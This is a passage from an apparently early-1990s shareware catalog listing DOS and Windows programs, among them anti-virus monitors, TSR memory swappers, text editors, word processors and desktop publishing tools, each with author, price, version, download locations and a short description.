data. Options to keep a log of shredded + files, to shred hidden & read only files, & make a backup copy + of the files before shredding. + + 2.8.1 Virus/Trojan detectors + + Product: Flu_Shot+ + Needs: IBM PC, DOS 2.1 or better. 16k RAM. + Author: Software Concepts Design, 212-889-6431 + Registration: $15.00 + Version: 1.82 (05-11-91) + User benefits: Regular updates and update discounts, timely + support, a clean copy directly from the author. + Look for: FSP*.ZIP on BBSs (call 212-889-6438 to download it at + no charge); FSP*.ZIP in IBMSYS forum LIB 0 on CompuServe. + Download size: 50k + Description: + An active monitoring program for detecting and preventing + computer viruses and insures the integrity of the programs you + use on your system. + + Chapter 2, "Utilities" 108 + + + + By selecting the various levels of protection you wish to + install on your system, you can be sure that the program you + are about to run is only the program you wanted to run and does + not contain any computer viruses. + + Winner of PC Magazine's Editor Choice award. Updated on a + regular basis. + + Product: Integrity Master(tm) [***] + Needs: IBM PC, DOS 2.0 or better. + Author: Stiller Research, 904-575-7884 + Registration: $35.00 + Version: 1.11a (02-17-91) + User benefits: Printed manual, master disks, virus support. + Look for: I-M*.ZIP on BBSs (call 215-623-6845 CONF77 to download + it at no charge); I-MAST.EXE in IBMSYS forum LIB 3 (multiple + files) on CompuServe. + Download size: 250k + Description: + A powerful comprehensize anti-virus and data integrity product. + Do you have a virus? A flaky hard disk? Did someone change a + file while you were out? Find out for sure with Integrity + Master. Use this to easily defeat viruses and get the extra + benefits of PC security, change control and disk problem + detection. It enables detection of ANY virus (not just known + ones), but doesn't need periodic updates, although it + recognizes known viruses by name. + + Product: PC Canary + Needs: IBM PC, DOS 2.1 or better. + Author: Compass / New England, 603-431 8030 + Registration: $19.95 + Version: 91g (05-15-91) + User benefits: Manual, most recent version, phone/mail/CIS + support; all registered users will be notified of any known + problems. + Look for: CY91G.* on BBSs (call 603-433 1859 to download it at no + charge); CY91G.EXE in IBMSYS forum LIB 3 on CompuServe; + CY91G.LZH in IBMPC RTC LIB 5 on GEnie. + Download size: 90k + Description: + * Detects modifications to .EXE, .DAT and COMMAND.COM files + * Installs easily + * Low maintenance; does not require frequent updates + * Low overhead (fast, not memory resident) + * Low false alarm rate + * Doesn't modify files; can be used with other security + programs + * Allows DOS upgrades + + Named for miner's canary whose death signalled invisible toxic + fumes. + + Chapter 2, "Utilities" 109 + + + + Product: STAFF-INTEGRATOR + Menu generator for STAFF and other S/W. See full description + on page 99. + + 2.8.2 Virus cleanup/removal + + Product: Integrity Master(tm) [***] + Easy to use anti-virus/data integrity prog. See full + description on page 108. + + 2.8.3 System activity monitors + + Product: Flu_Shot+ + Virus Detection/Prevention via active monitor. See full + description on page 107. + + Product: STAFF-INTEGRATOR + Menu generator for STAFF and other S/W. See full description + on page 99. + + 2.8.4 File integrity monitors + + Product: Flu_Shot+ + Virus Detection/Prevention via active monitor. See full + description on page 107. + + Product: Integrity Master(tm) [***] + Easy to use anti-virus/data integrity prog. See full + description on page 108. + + Product: PC Canary + Virus alarm. See full description on page 108. + + Product: STAFF-INTEGRATOR + Menu generator for STAFF and other S/W. See full description + on page 99. + + + 2.9 Software tools + + 2.9.1 For multiple programs + + Product: HDM IV - Hard Disk Menu + DOS Menu & Security System, Network Support. See full + description on page 96. + + Chapter 2, "Utilities" 110 + + + + 2.9.2 For Sidekick + + Product: CALendar preview for SideKick 2 + Needs: IBM PC, DOS 2.1 or better. Sidekick 2.0; 320k RAM; hard + disk. + Author: WetZoft Applications, 301-969-9385 + Registration: $25.00 + Version: 1.03 (05-13-91) + User benefits: Printed Manual & Latest Disk; + Phone,CompuServ,GEnie Support; Priority Enhancement + Consideration. + Look for: CALSK103.EXE on BBSs (call 414-789-4210 to download it + at no charge); CALSK.EXE in BORAPP forum LIB 1 on CompuServe; + CALSK103.EXE in BORLAND RTC LIB 15 on GEnie. + Download size: 92k + Description: + Produces a preview of your Calendar and ToDo's to the Screen, + Printer, or File from SK2's Calendar file (.DB) without + invoking SK2. Invoke from command line or batch file to preview + next 'n' days of activities. Features: Notes; Reminders; Look + Ahead, Searching, RTM Interface; Intl Sort; Fixed 4+ Hour + Appointments. + + Product: SWAPSK + Needs: IBM PC, DOS 3.1 or better. Borland's SideKick 1.0 or 2.0, + or SideKick Plus. + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $25.00 + Version: 1.7x (04-15-90) + User benefits: Disk and printed manual. + Look for: availability unknown on BBSs; SWSK17.COM in PCVENC + forum LIB 6 (multiple files) on CompuServe. + Download size: 35k + Description: + Makes it possible to load many popular TSRs in less than 8K of + your DOS memory. With a "High-DOS" memory manager, these + resident programs now require 0K of DOS memory. + + Chapter 2, "Utilities" 111 + + + + 2.9.2.1 Sidekick Plus specific + + Product: CALendar RePorT for SideKick+ + Needs: IBM PC, DOS 2.1 or better. 256k RAM. SideKick Plus. + Hard disk recommended. + Author: WetZoft Applications, 301-969-9385 + Registration: $25.00 + Version: 2.51 (04-08-91) + User benefits: Printed Manual & Latest Disk; + Phone,CompuServ,GEnie Support; Priority Enhancement + Consideration. + Look for: CALRP251.EXE on BBSs (call 414-789-4210 to download it + at no charge); CALRP.EXE in BORAPP forum LIB 2 on CompuServe; + CALRP251.EXE in BORLAND RTC LIB 15 on GEnie. + Download size: 80k + Description: + Produces nicely formatted calendar reports to Screen, Printer, + File from SK+'s Calendar file (.APP) without invoking SK+. + Invoke from command line or batch file to preview next 'n' days + of activities. Features: Notes; Reminders; Searching; Look + Ahead, Task Notes, RTM Interface; Many Options + + Product: CALendar report for TRaVel + Needs: IBM PC, DOS 2.1 or better. 256k RAM. Sidekick Plus. + Hard disk recommended. + Author: WetZoft Applications, 301-969-9385 + Registration: $25.00 + Version: 1.05 (04-08-91) + User benefits: Printed Manual & Latest Disk; + Phone,CompuServ,GEnie Support; Priority Enhancement + Consideration. + Look for: CALTR105.EXE on BBSs (call 414-789-4210 to download it + at no charge); CALTR.EXE in BORAPP forum LIB 2 on CompuServe; + CALTR105.EXE in BORLAND RTC LIB 15 on GEnie. + Download size: 81k + Description: + Produces formatted Daily, Weekly, Monthly calendar reports to + Screen, Printer, File from SK+'s Calendar file (.APP) without + invoking SK+. Like Traveling Sidekick! Invoke from command line + or batch file to preview next 'n' days, weeks, months of + activities. Features include: Notes; Install Program; Many + Options; NEW: Print Next Day, Week, Month; + + Chapter 2, "Utilities" 112 + + + + 2.9.3 For PC Tools + + 2.9.3.1 Deluxe Shell specific + + Product: SWAPDS + Needs: IBM PC, DOS 3.1 or better. PC Tools Deluxe Shell 6.0 or + Deluxe Desktop 6.0. + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $25.00 + Version: 1.7x (04-15-90) + User benefits: Disk and printed manual. + Look for: availability unknown on BBSs; SWDS17.COM in PCVENC + forum LIB 6 (multiple files) on CompuServe. + Download size: 35k + Description: + Makes it possible to load many popular TSRs in less than 8K of + your DOS memory. With a "High-DOS" memory manager, these + resident programs now require 0K of DOS memory. + + 2.9.4 For 4DOS + + Product: 4EDIT + Full-screen editor for file descriptions. See full description + on page 100. + + Product: 4FILES [***] + File manager & annotator for 4DOS & NDOS. See full description + on page 100. + + Product: 4ZIP/4UNZIP + Needs: IBM PC, DOS 2.0 or better. 4DOS; PKZIP/PKUNZIP. + Author: XD Systems, 703-821-3215 + Registration: $15.00 + Version: 2.00 (10-24-91) + User benefits: Disk and printed manual; telephone and CIS + support; public domain bonus programs. + Look for: availability unknown on BBSs; 4ZIP.ZIP in IBMSYS forum + LIB 1 on CompuServe. + Download size: 155k + Description: + A utility for 4DOS. Used with the PKWare compression program + PKZIP, it compresses 4DOS file descriptions along with the + files. The included program 4UNZIP calls PKUnzip and restores + the descriptions as each file is uncompressed. Select files to + Zip or Unzip from a full-screen list with extended wildcards. + Pass through commands to PKZIP and PKUNZIP, obtained + separately. + + Supports 4DOS 4.0 80 character descriptions and extended + fields. + + Chapter 2, "Utilities" 113 + + + + 2.9.5 For Lotus + + Product: SWAPLM + Needs: IBM PC, DOS 3.1 or better. Lotus Metro or Lotus Express. + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $25.00 + Version: 1.7x (04-15-90) + User benefits: Disk and printed manual. + Look for: availability unknown on BBSs; SWLM17.COM in PCVENC + forum LIB 6 (multiple files) on CompuServe. + Download size: 35k + Description: + Makes it possible to load many popular TSRs in less than 8K of + your DOS memory. With a "High-DOS" memory manager, these + resident programs now require 0K of DOS memory. + + 2.9.6 For Norton + + Product: DiZkND + THE DiZk cataloger for NDOS. See full description on page 11. + + 2.9.6.1 For Norton Guides + + Product: SWAPNG + Needs: IBM PC, DOS 3.1 or better. Norton Guides. + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $25.00 + Version: 1.7x (04-15-90) + User benefits: Disk and printed manual. + Look for: availability unknown on BBSs; SWNG17.COM in PCVENC + forum LIB 6 (multiple files) on CompuServe. + Download size: 35k + Description: + Makes it possible to load many popular TSRs in less than 8K of + your DOS memory. With a "High-DOS" memory manager, these + resident programs now require 0K of DOS memory. + + 2.9.6.2 For Norton Utilities + + Product: 4FILES [***] + File manager & annotator for 4DOS & NDOS. See full description + on page 100. + + 2.9.7 For PKWARE + + 2.9.7.1 For PKZIP/PKUNZIP + + Product: 4ZIP/4UNZIP + Includes 4DOS file descriptions in ZIP files. See full + description on page 112. + + Product: EZ-Reader + Offline mail reader for PCBoard & Wildcat! See full + description on page 161. + + Chapter 2, "Utilities" 114 + + + + Product: Nifty James's File Finder + File/Archive finder for DOS. See full description on page 19. + + Product: NJ's File Finder for Windows + Finds files/archives under Microsoft Windows. See full + description on page 19. + + Product: PMZIP + OS/2 Presentation Manager ZIP shell. See full description on + page 35. + + Product: QFiler + Simple, powerful with 2 side-by-side windows. See full + description on page 103. + + Product: Shez [***] + Program shell for managing compressed files. See full + description on page 36. + + Product: WinZip + Windows ZIP/LZH/ARC Shell:View/Run/Extract/+. See full + description on page 37. + + Product: ZiPaper + Randomly select Wallpaper - store compressed! See full + description on page 317. + + 2.9.8 For other + + Product: dLITE + Memory-res dBASE-Compat Desktop File Manager. See full + description on page 140. + + Product: SWAPDOS + Switches from one large program to another. See full + description on page 41. + + Product: SWAPMM + Needs: IBM PC, DOS 3.1 or better. Broderbund's MemoryMate. + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $25.00 + Version: 1.7x (04-15-90) + User benefits: Disk and printed manual. + Look for: availability unknown on BBSs; SWMM17.COM in PCVENC + forum LIB 6 (multiple files) on CompuServe. + Download size: 35k + Description: + Makes it possible to load many popular TSRs in less than 8K of + your DOS memory. With a "High-DOS" memory manager, these + resident programs now require 0K of DOS memory. + + Chapter 2, "Utilities" 115 + + + + Product: SWAPTN + Needs: IBM PC, DOS 3.1 or better. Micrologic's Tornado. + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $25.00 + Version: 1.7x (04-15-90) + User benefits: Disk and printed manual. + Look for: availability unknown on BBSs; SWTN17.COM in PCVENC + forum LIB 6 (multiple files) on CompuServe. + Download size: 35k + Description: + Makes it possible to load many popular TSRs in less than 8K of + your DOS memory. With a "High-DOS" memory manager, these + resident programs now require 0K of DOS memory. + + + 2.10 Other + + Product: LiteSPM + Needs: IBM PC, DOS 2.1 or better. 25k RAM. + Author: Information Technology, Ltd., 401-724-2730 + Registration: $15.00 + Version: 1.01 (07-01-91) + User benefits: Latest version, free telephone support, + notification of inexpensive updates. + Look for: SPM.ZIP on BBSs; SPM.ZIP in PCM:UTILFORUM forum LIB 14 + on CompuServe; SPM.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 49k + Description: + A background (TSR) serial port montior capable of logging + serial port data to disk in an unattended mode. Takes less + than 25K when resident. User configurable. Frees your system + for other work while still capturing that valuable data. + + Chapter 3, "Writing applications" 116 + + + + + + Chapter 3 + Writing applications + + See also: Utilities, File utilities, File viewers (page 39). + + + 3.1 Text editors + + See also: Writing applications, Word processors (page 122). + + Product: AM-EDIT + Needs: IBM PC, DOS 2.0 or better. Hard disk. + Author: PLC Software, 205-822-1619 + Registration: $37.00 + Version: 1.00 (01-10-92) + User benefits: Latest version with up-to-date on-disk manual; 6 + month voice/CIS support; notification of new releases; right to + purchase any new release at $30 discount. + Look for: availability unknown on BBSs. + Download size: 42k + Description: + A full-screen text editor which is both powerful and extremely + easy to use. Includes extensive on-screen help. Very fast in + loading/saving files and finding text strings. Allows merging + of text files. Includes a calculator and a User ID function, + allowing up to 30 different users to have their own parameters + such as screen colors, backup option, and lines-to-scroll. Can + store up to 3.5 times as much text in real memory as some PC + editors. Entire system contained in a single 42K program. + + Product: BOXER(tm) Text Editing System + Needs: IBM PC, DOS 2.0 or better. Hard disk or 720K floppy + drive. + Author: BOXER Software, 603-924-6602 + Registration: $35.00 + Version: 3.20 (01-25-92) + User benefits: Latest version, quick reference card, LEFTHAND MAN + file browser program, phone support. + Look for: BOX*.ZIP on BBSs (call 215-623-6203,JOIN77 to download + it at no charge); BOX*.ZIP in IBMAPP forum LIB 1 on CompuServe; + BOX*.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 246k + Description: + A powerful, full-featured Text Editor. Features 512-level Undo, + full mouse support, 28/43/50 lines for E/VGA, multiple files/ + windows, column marking, editable keystroke macros, search + across all edited files, graphic drawing, colors, compile from + editor, word processing and context sensitive help. Extensive + block text commands: sort, fill, case, total, invert... + Reconfigurable keyboard with popular maps supplied; pull-down + menus & online help change *dynamically* to reflect + reassignment! + + Chapter 3, "Writing applications" 117 + + + + Product: EDWORD + Needs: IBM PC, DOS 2.0 or better. + Author: FAGERLUND CONSULTING, 604-984-7330 + Registration: $44.00 + Version: 1.0 (11-26-91) + User benefits: Printed user's guide. Six months free voice + telephone support. + Look for: EDWORD.ZIP on BBSs; EDWORD.ZIP in IBMAPP forum LIB 1 on + CompuServe; EDWORD.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 75k + Description: + This full featured, multi-file text editor is small, quick and + easy to use. It uses a numbered file list to assist when + editing many files from various directories. Allows search and + replace through all files in the list. Can search + subdirectories to locate files for editing. Prints to any + printer in 2 modes with optional line numbers. Has line + drawing, cut and paste, macros, ASCII table, no file size + limit, color or b/w, 3 help screens. + + Product: Flex + Fast multiwindow word processor. See full description on + page 122. + + Product: KWIKWRITE + Word Processor. See full description on page 122. + + Product: NED + Needs: IBM PC, DOS 2.11 or better. 256K RAM, CGA monitor. + Author: David L. Dight, +61-2 331-4521 + Registration: $50.00 + Version: 1.6b (02-18-92) + User benefits: Printed manual, master disks, mail/email support, + one free major uprade. + Look for: NEDIT.EXE on BBSs (call +1 505 662-0659 to download it + at no charge); NEDIT.EXE in IBMAPP forum LIB 1 on CompuServe. + Download size: 208k + Description: + A high performance text editor. Features: Edit up to 10 files; + Expand wildcards, pick lists; On line calculator, ASCII tables + and help; Super fast screens; EGA43/VGA50 line modes; std. edit + functions+more; autosave; {} match, field copy, copy strings to + search/last command; Embed print commands; Print while you + work; Powerful reg. expr. search & replace; Use DOS; Config. + env.; Block/column copy, cut, paste and format across files(s); + Kbd macros; Browse drives/dirs for files. + + Chapter 3, "Writing applications" 118 + + + + Product: Oak Hill Vi(tm) + Needs: IBM PC, DOS 2.1 or better. + Author: Oak Hill Software, Inc., 908-671-8544 + Registration: $60.00 + Version: 5.7A (05-18-91) + User benefits: Latest version on disk, typeset-quality manual, + support by mail. + Look for: availability unknown on BBSs; VI57A1.ZIP in IBMAPP + forum LIB 1 on CompuServe. + Download size: 160k + Description: + A professional-grade version of "vi", the standard UNIX full- + screen text editor. Includes virtually all vi features: undo, + map/abbreviation macros, text search/substitution with meta + characters, shell escapes, external filters, margin wrap, save + buffers, line numbers and auto-indent, plus built-in paragraph + formatting, color control, line centering, case conversion and + more. Archive includes comprehensive manual and utilities. + + Product: OMNIDay + Daily Diary Program For Up To 10 Users. See full description + on page 92. + + Product: pE - The "perfect" Editor(tm) + Needs: IBM PC, DOS 2.1 or better. + Author: Just Excellent Software, Inc., 215-565-7780 + Registration: $39.00 + Version: 2.77 (08-25-91) + User benefits: Printed manual, Multi-math calculator, separate + print utility, keyboard reconfigurator, technical support and + free upgrade to next major release. + Look for: PETPE277.ZIP on BBSs; PETPE.EXE in IBMAPP forum LIB 1 + on CompuServe. + Download size: 227k + Description: + Up to 20 movable, sizable, overlayed or tiled windows. Mouse + interface allows easy cut, paste, move, mark, etc. Works well + with keyboard also. Full featured with regular expressions, + brace matching, key macros, include file editing and over 100 + other functions. Word process mode allows auto reformat, and + justification. Box and line drawing for easy, quick forms can + be done with mouse or cursor keys. Files the size of memory, + very fast. Pull down menus and extensive on-line help make it + easy. + + Chapter 3, "Writing applications" 119 + + + + Product: pEDIT PLUS + Needs: IBM PC, DOS 2.1 or better. 384k RAM. CGA monitor and + hard disk recommended. + Author: T. G. Muench, 602-445-2479 + Registration: $30.00 + Version: 1.0 (12-15-91) + User benefits: Master disks, unlimited support, bonus utilities, + product discounts. Shareware disks of other programs. + Look for: PEDIT*.ZIP on BBSs; PEDIT.ZIP in IBMAPP forum LIB 1 on + CompuServe. + Download size: 192k + Description: + This DOS-based text editor has a graphical interface and full + mouse support. The graphical ButtonBar gives quick access to 18 + functions without having to deal with menus. Text-only mode. + Wordstar, EMACS and MS Quick Editor emulation. Auto word wrap, + paragraph indent, case change, block indent, timed autosave, + Ascii chart, DOS buffer. Now handles up to 16 files at one + time. Also new is a tutorial that walks you through the basics + of editing. Rated a Trophy by Public Brand. + + Product: PostCardMaster + PostCard & Mail Handling System. See full description on + page 146. + + Product: QEdit(R) Advanced + Needs: IBM PC, DOS 2.0 or better. + Author: SemWare, 404-641-9002 + Registration: $54.95 + Version: 2.1 (04-03-90) + User benefits: 140-page professionally printed, indexed, spiral + bound manual. Quick reference card. Friendly, knowledgeable + tech support via phone, multi-line bbs, FAX and/or mail. Access + to maintenance releases on bbs. Low cost major updates. + Look for: QEDIT21.ZIP on BBSs (call 404-641-8968 to download it + at no charge); QEDIT.ZIP in IBMAPP forum LIB 1 on CompuServe. + Download size: 128k + Description: + Blazingly Fast, multi-file, multi-window, compact (44k) text + editor, that is powerful, yet EASY to use. Includes pulldown + menus, macros, column blocks, and basic word-processing + features. Completely configurable, including keyboard, colors + and initial settings. New in version 2.1 are: swap to disk/EMS + on shell, CenterLine, plus much more! 1989 Data Based Advisor + readers choice as best Program/Text Editor. Over 75,000 + licensed users. Rated as "Highly recommended" by John Dvorak in + 1989 PC Magazine. + + Chapter 3, "Writing applications" 120 + + + + Product: Ravitz Editor + Needs: IBM PC, DOS 2.0 or better. + Author: Ravitz Software Inc., 606-268-4223 + Registration: $35.00 + Version: 1.10 (08-31-91) + User benefits: Mail and BBS support, current disk. + Look for: RAVED.ZIP on BBSs (call 606-268-0577 to download it at + no charge); RAVED.ZIP in IBMAPP forum LIB 1 on CompuServe. + Download size: 150k + Description: + A fast, powerful, mid sized, text editor. It has integrated + outlining and overviewing, area mark manipulation (copy, fill, + shift, sort, etc.), find/change, word wrap and reflow, line + drawing, multiple file handling, change tracking, flexible user + interface (function keys, mouse, menus), and it is configurable + and programmable. + + Product: Technical Editor + Needs: IBM PC, DOS 2.0 or better. + Author: Superior Soft + Registration: $39.95 + Version: 2.61 (09-02-91) + User benefits: Printed manual, BBS and mail support, Source code + available. + Look for: availability unknown on BBSs; TE261*.ZIP in IBMAPP + forum LIB 1 (multiple files) on CompuServe. + Download size: 125k + Description: + A fast, full featured and unique programmer's/text editor. + Features include: + * Virtual memory (edits huge files) + * XMS support + * Undo last 100 changes + * 25,43,50 line display support + * Re-definable commands + * Binary mode for editing binary files + * Keystroke macros + * Line and column blocking modes + * Regular expression search and replace + * Keystroke macros + * Bookmarks + * File pick lists + * Multi-Screen AND multi-Window + + Chapter 3, "Writing applications" 121 + + + + Product: WinEdit + Needs: IBM PC, Windows 3.0 or better. Mouse recommended. + Author: Wilson WindowWare, Inc., 206-937-9335 + Registration: $59.95 + Version: 1.1C (07-01-91) + User benefits: Printed manual, tech support, 90-day money back + gaurantee. + Look for: WED11C.ZIP on BBSs (call 206-935-5198 to download it at + no charge); WED11C.ZIP in WINAPA forum LIB 15 on CompuServe. + Download size: 90k + Description: + A new text editor designed to take full advantage of the + Windows 3.0 environment. First and foremost a programmers + editor, it has features designed for creating and maintaining + program source code. With its ASCII file format, ability to + edit files of almost unlimited size, and easy-to-use ribbon + bar, it makes the perfect editor for everyday use. + + Product: WordMaster + ASCII Word Processor. See full description on page 123. + + + 3.2 Text organizers + + Product: dtSearch + Document search and retrieval program. See full description on + page 147. + + Product: Index! [***] + Automatic Index Coding for Ventura Publisher. See full + description on page 126. + + Product: MakeDemo + Presentation program with interactive menuing. See full + description on page 167. + + Product: PAGE COUNT [***] + Needs: IBM PC, DOS 3.3 or better. + Author: Tinker Software + Registration: $15.00 + Version: 2.0A (11-23-91) + User benefits: Unlimited fax/BBS support. + Look for: PGCNT20A.ZIP on BBSs (call 206-852-7708 to download it + at no charge); PGCNT2.ZIP in IBMAPP forum LIB 1 on CompuServe. + Download size: 73k + Description: + Takes any normal text file and compute how many pages of + standard paper it will take to print out the file. All + computation is based on printing 55 lines per page. With this + version you will have the option to print out the file from + within the program. During printing you will be informed as to + the number of pages read into the print buffer. + + Chapter 3, "Writing applications" 122 + + + + Product: Ravitz Editor + Text editor/outliner. See full description on page 119. + + Product: TDisplay [***] + Creates Customized Self-Displaying Text Files. See full + description on page 38. + + + 3.3 Word processors + + See also: Writing applications, Text editors (page 116). + + Product: BOXER(tm) Text Editing System + Full featured Text Editor/Word Processor. See full description + on page 116. + + Product: Cumberland Diary [***] + Diary/ Journal Entry Program. See full description on + page 344. + + Product: Cumberland Story [***] + Write your own or your ancestor's life story. See full + description on page 345. + + Product: Flex + Needs: IBM PC, DOS 2.1 or better. + Author: Logical Systems + Registration: $29.95 + Version: 1.02 (06-16-91) + User benefits: Personalized latest version, unlimited BBS + support, extra utilities. + Look for: FLEX*.LZH on BBSs (call 501-985-0059 to download it at + no charge); FLEX102.LZH in IBMPC RTC LIB 3 on GEnie. + Download size: 150k + Description: + Powerful multiwindow word processor. Block moves, macros, + configurable colors, supports 26 printers, EGA/VGA 43 and 50 + line modes, context-sensitive online help, smart tabbing and + indenting, optional auto-save or .BAK files, more. + + Product: KWIKWRITE + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Author: TexaSoft, 214-291-2115 + Registration: $35.00 + Version: 4.01 (01-01-91) + User benefits: Printed Manual, newsletter. + Look for: KWRITE.ZIP on BBSs; KWRITE.ZIP in IBMAPP forum LIB 2 on + CompuServe. + Download size: 250k + Description: + A small, simple to use word processor. It fits on one disk, and + is a good choice when you don't want to take up too much space + on your disk (like in a laptop). Creates and edits normal ASCII + files, so the editor can also be used for programming, writing + + Chapter 3, "Writing applications" 123 + + + + batch files or other ASCII files. Can merge information from + dBASE database (mail-merge). + + Product: LQMATRIX + Softfonts and softfont editor for Epson LQ. See full + description on page 49. + + Product: PACE + Needs: IBM PC, DOS 2.0 or better. + Author: Mark Tigges, 604-926-0366 + Registration: $45.00 + Version: 1.0 (11-22-90) + User benefits: Free upgrade and technical support. + Look for: DOPPLER (multiple files) on BBSs (call 604-277-9970 to + download it at no charge). + Download size: 500k + Description: + Designed to supply to the public an easy to use, yet powerful + word processor, for an affordable price. With the first version + complete, the objective has been fullfilled. Has all of the + standard features, primed for speed and convience, and is a + word processing enviornment that fullfills. + + Major features include context sensitive help, DOS shell, + multiple file in-window editing and more. Plus files are not + restricted to a size limit. A powerful program that is easy to + learn. + + Product: pE - The "perfect" Editor(tm) + Windowed Text Editor/Word Processor. See full description on + page 118. + + Product: pEDIT PLUS + The personal EDITor PLUS. See full description on page 118. + + Product: QEdit(R) Advanced + FAST, compact, multi-file/window text editor. See full + description on page 119. + + Product: Save the Planet + Ozone & greenhouse data, easy word processor. See full + description on page 298. + + Chapter 3, "Writing applications" 124 + + + + Product: WordMaster + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Author: MasterWorks, 206-495-4574 + Registration: $30.00 + Version: 1.7 (07-11-91) + User benefits: Receive personalized copy of most recent version + without reminders. + Look for: WDMASTER.EXE on BBSs (call 901-753-7213 to download it + at no charge); WDMSTR.EXE in IBMAPP forum LIB 2 on CompuServe; + WDMASTER.EXE in IBMPC RTC LIB 3 on GEnie. + Download size: 210k + Description: + Full-featured word processor with extensive pull-down menu + system and on-line help. Includes: multiple fonts, macros, + windows, search and replace, cutting/pasting text, headers/ + footers, automatic pagination, the ability to customize colors + and command structure and more. The documentation includes + examples of using various functions to help you work easier and + faster. + + + 3.4 Desktop publishing + + Product: ALPHAQUOTE + Typesetting and DTP Estimating. See full description on + page 310. + + Product: CODE TO CODE + Needs: IBM PC, DOS 3.0 or better. + Author: AlphaBytes, Inc., 202-546-4119 + Registration: $29.00 + Version: 4.0 (04-29-91) + User benefits: Latest version with printed manual and free phone + support. + Look for: CTOC40.ZIP on BBSs (call 414-789-4202 to download it at + no charge); CTOC40.EXE in DTPFORUM forum LIB 6 on CompuServe. + Download size: 143k + Description: + Automatically manages cryptic codes (such as or @HEAD = + )left in text files by typesetting and desktop publishing + programs. This new version can translate, strip or replace + codes in one pass. Now spell-check or run a thesaurus without + codes choking your system. CTC can work with DOS wildcards to + process many files with one command or it' s own built in menu + system. Other features include a graphic arts calculator, on- + line help, DOS shell and complete docs. + + Chapter 3, "Writing applications" 125 + + + + Product: Crossword Clipper for Windows + Needs: IBM AT (80286), Windows 3.0 or better. Crossword Creator + 5.0 for puzzle design. + Author: PC HELP-LINE, 714-797-3091 + Registration: $50.00 + Version: 1.00 (02-01-92) + User benefits: Printed manual, master disks, technical support. + Look for: CWCLIP.ZIP on BBSs; CWCLIP.ZIP in IBMNEW forum LIB 8 on + CompuServe. + Download size: 200k + Description: + This crossword layout tool works with the Windows Clipboard, + enabling you to paste your puzzles into desktop publishing + applications. WYSIWYG display lets you resize the puzzle grid, + select fonts, etc. Also creates Windows bitmap (.BMP) graphic + files. + + Cannot be used for puzzle design, but will accept crossword + data files (.XWP format only) from other programs. A companion + program, Crossword Creator, is the preferred design tool. + + Product: Crossword Creator + Multi-lingual crossword puzzle editor. See full description on + page 381. + + Product: Decoder! [***] + Needs: Unknown. + Author: Trinity Software, 703-791-2576 + Registration: $79.00 + Version: 1.2 (09-13-91) + User benefits: Printed manual, master disks, support, free + updates, upgrade discounts. + Look for: availability unknown on BBSs; DECD12.ZIP in DTPFORUM + forum LIB 7 on CompuServe; DECD12.ZIP in IBMPC RTC LIB 15 on + GEnie. + Download size: 76k + Description: + Optimized for use with ASCII, Word, and WordPerfect, but will + strip most file formats. Handles quotes, dash and ellipses; + converts other 3-digit codes to ASCII equivalents. Runs in + seconds to make files useable by other applications. + + Chapter 3, "Writing applications" 126 + + + + Product: Filer! [***] + Needs: Unknown. 640k RAM. + Author: Trinity Software, 703-791-2576 + Registration: $79.00 + Version: 1.92 (12-16-91) + User benefits: Printed manual, master disks, support, free + updates, upgrade discounts, bonus utilities. + Look for: availability unknown on BBSs; FIL192.ZIP in DTPFORUM + forum LIB 7 on CompuServe; FIL192.ZIP in IBMPC RTC LIB 15 on + GEnie. + Download size: 194k + Description: + Menu-driven file management system tracks all files, using 3 + windows to display a list of .PUB and .CHP files, a list of + files which make up the currently-selected .CHP, and text from + the largest file in the .CHP. Copy, delete, move, backup, + compress, decompress any combination of files. All internal + file pointers updated. Many more features; major application. + + Product: GEMCAP + Capture text/graphics screens in GEM .IMG fmt. See full + description on page 312. + + Product: Index! [***] + Needs: Unknown. 400k RAM. + Author: Trinity Software, 703-791-2576 + Registration: $79.00 + Version: 1.4e (05-30-91) + User benefits: Printed manual, master disks, bonus utilities, + support, free updates, upgrade discounts. + Look for: availability unknown on BBSs; IND14E.ZIP in DTPFORUM + forum LIB 7 on CompuServe; IND14E.ZIP in IBMPC RTC LIB 15 on + GEnie. + Download size: 111k + Description: + Menu-driven indexing utility lets you enter terms to index in a + database. Then searches up to 100 chapters at a time, finds + every instance of your terms, builds and inserts the index + codes Ventura needs. Index preview option ensures proper + database entry. Automatic publication, chapter and file + selection. Easily reduces indexing time by 90%. + + Product: LQMATRIX + Softfonts and softfont editor for Epson LQ. See full + description on page 49. + + Product: PM2LINO [***] + Removes Ctrl-D characters from PostScript. See full + description on page 59. + + Product: PRO-CR + Professional Optical Character Recognition. See full + description on page 310. + + Chapter 3, "Writing applications" 127 + + + + Product: PS-TEXT [***] + Extracts text from PostScript file to ASCII. See full + description on page 60. + + Product: QFont + Font editor for HP LaserJet soft fonts. See full description + on page 58. + + Product: Rubicon Publisher + Needs: IBM PC, DOS 2.1 or better. Disk space varies: 1.1MB for + 9-Pin, 1.5MB for 24-pin, 1.6MB for LaserJet 2, 1.0MB for + LaserJet 3 or Postscript. Optional preview requires VGA + monitor. + Author: Rubicon Computer Labs Inc., 819-770-4317 + Registration: $59.50 + Version: 2.2C (06-08-91) + User benefits: Printed manual. Hyphenologist, Times, Helv, + Classic & Nova Fonts. Third-Party Font Support. Optimal + Paragraph Composition, LaserJet Graphics. + Look for: availability unknown on BBSs. + Download size: 337k + Description: + Comprehensive desktop publisher based on traditional + typesetting concepts; over 120 features. Supports over 200 + printers including most popular 9 & 24 pin dot matrix, LaserJet + 2 & 3, & Postscript. Comes with 2 font families; supports + LaserJet 3 & Postscript fonts. Batch processor, controlled by + tags embedded in the input file. User's present word processor + or text editor can be used to prepare (Ascii) files for + publication. Screen preview provided for computers with VGA. + Great quality output! + + Product: Swap! [***] + Needs: Unknown. EGA/VGA monitors only (not SVGA); Microsoft- + compatible mouse; non-network environment. 1MB exp. or ext. + memory recommended. + Author: Trinity Software, 703-791-2576 + Registration: $49.00 + Version: 1.5 (11-26-90) + User benefits: Printed manual, master disks, support, free + updates, upgrade discounts, bonus utilities. + Look for: availability unknown on BBSs; 